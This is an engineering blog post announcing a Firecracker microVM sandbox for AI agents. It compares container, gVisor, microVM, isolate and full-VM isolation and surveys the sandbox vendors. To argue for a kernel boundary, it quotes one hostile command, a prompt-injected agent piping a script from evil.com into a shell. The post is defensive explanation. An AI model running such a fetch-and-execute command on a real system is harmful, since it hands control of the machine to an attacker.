● May 13, 2026 Engineering · 9 min

MicroVM sandboxes for AI agents: the case, the players, and what we're shipping

In 2025 the question "where does an AI agent's code run" was a research problem. By the middle of 2026 it is an incident-response problem. Containers are no longer a sandbox in any meaningful sense, and the gap between an agent that can write code and one that can safely execute it has become the most expensive piece of infrastructure most teams forget to budget for.

Claude Code, Codex, Gemini, Antigravity, and a dozen open-source agent frameworks now routinely install packages, run servers, modify filesystems and open network connections. The volume is real — millions of sessions per day across the major providers — and the failure modes are real with them. Microsoft Security disclosed CVE-2026-25592 and CVE-2026-26030 in Semantic Kernel earlier this month: a single prompt injection could be turned into host-level RCE, which is exactly the outcome the sandbox is supposed to make impossible. Pillar Security disclosed a separate sandbox-escape chain in Google's Antigravity agent manager a week later. There will be more.

The answer to "where does the code run" is now a technical decision with security consequences. This post lays out the spectrum of options, what the current vendors actually ship under the hood, and the microVM runtime we are about to make available on LLM4Agents.

The isolation spectrum

Five layers, weakest to strongest, with the tradeoffs each one forces:

Plain containers (Docker, runc). Linux namespaces + cgroups. The agent shares the host kernel. A kernel bug becomes a host compromise. Egress is uncontrolled by default. Cold start is fast (50–200ms) and image catalogs are huge, which is why most code-execution products started here. None of this is sufficient for untrusted code.

Hardened containers (gVisor, Sysbox). A user-space kernel sits between the workload and the host. Syscall surface drops by an order of magnitude. Compatibility is the catch — some syscalls behave differently and some workloads (low-level Python C extensions, certain Node native modules) simply fail. Performance overhead is 10–30% depending on the workload.

MicroVMs (Firecracker, Cloud Hypervisor, Kata). A dedicated guest kernel per workload, hardware virtualization extensions (KVM), and a minimal device model. Firecracker — the engine AWS uses for Lambda and Fargate — boots a microVM in roughly 125 milliseconds, consumes under 5 MiB of memory overhead, and supports up to 150 microVMs per second per host. This is the strongest isolation that still has interactive cold-start latency.

JS isolates (V8 Isolates, Cloudflare Dynamic Workers). A different model entirely: a sandboxed JavaScript runtime running inside a process, no OS-level isolation. Cold start measured in milliseconds and density measured in tens of thousands per host. Restricted to JS (or anything that compiles to it via WASM), but unbeatable for stateless, short-lived tool calls.

Full VMs (KVM/QEMU, EC2-style). The traditional answer. Multi-second boots, gigabytes of overhead per instance, full hardware emulation. Strong isolation, wrong economics for ephemeral agent workloads.

The right way to read this list: containers and full VMs are the endpoints of the price-vs-safety curve, and microVMs are the point on that curve where the curve bends sharply in the agent's favor. You pay 100–200ms of cold start and a few MiB of RAM in exchange for a kernel boundary the agent's prompt-injected code cannot reach.

What the current vendors actually ship

E2B — Firecracker microVMs with a dedicated kernel per sandbox, cold starts around 150–200ms, the largest catalog of agent-ready templates, and a Python-centric SDK with first-class support for stateful interpreter sessions. The pitch is conservative: maximum isolation, accept the cold-start cost.

Daytona — Container-based by default with optional Kata or Sysbox for stronger isolation. Headline number is sub-90ms cold start, with optimized configurations touching 27ms. The bet is that most agent workloads can live with container-grade isolation in exchange for sub-100ms latency, and the operator opts into microVM isolation when the workload demands it.

Modal — The only platform where a sandbox can hold a GPU. If the agent needs to run inference, fine-tune, or process images inside the same isolated process that calls tools, Modal is the only serious option today. Isolation is gVisor + container; the GPU passthrough is the differentiator.

Cloudflare — A dual stack that became generally available in April: Dynamic Workers (V8 isolates, milliseconds cold start, JS/WASM only) for ephemeral tool calls, and Sandboxes (full Linux containers with a shell, persistent filesystem, PTY terminal, background processes) for the cases where the agent needs to clone a repo, install Python packages, and run a dev server. Distributed across the edge by default.

SmolVM — Worth noting because it is the simplest answer in the field. A single-binary microVM built on libkrun and Apple's Hypervisor.framework, sub-200ms cold start, designed to be embedded directly in an agent's process and discarded after each invocation. Not a hosted service; a primitive.

The honest summary: there is no single right answer in May 2026. There is a tradeoff axis between cold-start latency, isolation strength, language support, GPU support, and operational simplicity, and every vendor is occupying a different point on it.

Why microVMs are the right primitive for an agent platform

We made the call to build on microVMs (Firecracker on the hot path, with a path to Cloud Hypervisor for nested virtualization workloads) rather than containers or isolates. Four reasons.

Kernel boundary. An agent acting on hostile inputs — and every public-facing agent is acting on hostile inputs — needs the strongest practical isolation. Container escapes are a regular CVE category; microVM escapes have been theoretical so far, and the attack surface is an order of magnitude smaller. When a prompt-injected agent runs curl evil.com | sh, we want the blast radius to end at the guest kernel, not the host.

Language and runtime neutrality. An agent that picks the right tool for the job should be able to run Python, Node, Rust, Go, Deno, Bun, Java, shell scripts, and anything else its base image carries, without the platform constraining the choice. Isolates limit you to one language family; microVMs do not.

Snapshot and restore. Firecracker's snapshotting lets us freeze a fully-initialised VM (kernel booted, language runtime warm, dependencies installed, user code loaded) and clone it in tens of milliseconds. For interactive coding agents this is the difference between a 4-second feedback loop and a 400-millisecond one. It also makes per-session billing honest — the user pays for what their code actually ran, not for the cold start of a fresh image.

Network and filesystem policy at the boundary. Every microVM gets a virtual NIC and a virtual block device that the host owns. Egress rules, DNS rewrites, credential injection via egress proxy, write-blocking on configuration paths, and full network capture for forensics — all of it lives at the host, where the agent cannot disable it. NVIDIA's guidance on sandboxing agentic workflows, published in March, treats this as a hard requirement; the same conclusion comes out of every prompt-injection incident report we have read.

Use cases the agent-sandbox category actually has to serve

Five workloads cover the great majority of real production traffic we have seen and that we are designing for.

Code interpreter for data and analysis. Agent receives a question, writes Python, executes it against a CSV or a SQL dump, returns the answer with the chart. The sandbox needs Pandas, NumPy, Matplotlib, a few common DB drivers. Session state matters; a follow-up question reuses the dataframe in memory.

Web automation behind a real browser. Headless Chromium inside the sandbox, controlled by the agent. The browser is the prompt-injection attack surface and the sandbox is what keeps a malicious page from owning the host. This is the workload where microVM isolation pays back fastest.

Code-writing agents in the Claude-Code, Codex, Aider lineage. Clone a repo, install dependencies, run a build, run tests, propose a patch, iterate. Long sessions (tens of minutes), heavy filesystem use, occasional dev-server spin-up. Containers can do this; microVMs do it with a usable security story.

Agent-provisioned infrastructure. Agent provisions cloud resources, runs Terraform, deploys a stack, runs smoke tests. The credentials the agent uses are the highest-value target on the box, and credential-handling has to happen outside the sandbox boundary — injected by an egress proxy, never readable by the guest.

Background workers for asynchronous agents. Agent schedules a long-running job (scrape, summarise, post), comes back later to check. The sandbox holds state between turns. Snapshot+restore is what makes this economical at fleet scale.

What we are shipping

LLM4Agents is adding a microVM sandbox as a first-class part of the platform, alongside the LLM gateway and the MCP tools. Specifics, with the usual caveats that the numbers will shift as we burn in:

Firecracker-based microVMs with dedicated guest kernels. Snapshot-backed cold start in the 150–250ms range for warm templates. Per-second billing in USDC or USDT against the same agent wallet that funds inference, so adding code execution does not require a second balance, a second API key, or a second bill. Egress proxy with credential injection. Persistent filesystem volumes that the agent can attach across sessions. Language-neutral base images plus a build-your-own template path. Compatible with the OpenAI Code Interpreter API surface for drop-in migration where it makes sense.

The honest tradeoff list, because no piece of infrastructure is free: cold start is not as fast as a JS isolate and will not be — physics of booting a kernel. GPU passthrough is not in the first release; if your agent needs a GPU we recommend Modal for now. The platform mitigates prompt-injection blast radius, it does not prevent prompt injection itself — that is a model and tool-design problem and we will write a separate post about how we are approaching it.

Why this belongs on the same platform — every other piece of infrastructure an autonomous agent needs is already on LLM4Agents: 345+ models behind one OpenAI-compatible endpoint, MCP tools (browser, search, image generation), gasless USDT/USDC settlement, a per-agent wallet that is the economic identity. Code execution was the missing layer. Putting it on the same balance closes the loop on "an agent should be able to register, fund itself, and operate end-to-end without a human opening N accounts."

What to do today

If you are shipping an agent in the next thirty days and need code execution now, E2B and Daytona are the safe picks; pick E2B when isolation strength is the constraint, pick Daytona when cold start is. If you need a GPU, Modal. If your agent is a Cloudflare Workers app, the dual stack is the path of least resistance.

If you are designing for the next twelve months and you want the LLM gateway, the MCP tools, and the sandbox to share an identity and a balance, the LLM4Agents microVM runtime is what we are about to put in front of you. Beta access opens in the coming weeks; if you want in early, the docs and the registration endpoint are below.

Be among the first to run agent code on LLM4Agents

Same API key, same wallet, same OpenAI-compatible surface — now with microVM-isolated code execution alongside inference and MCP tools.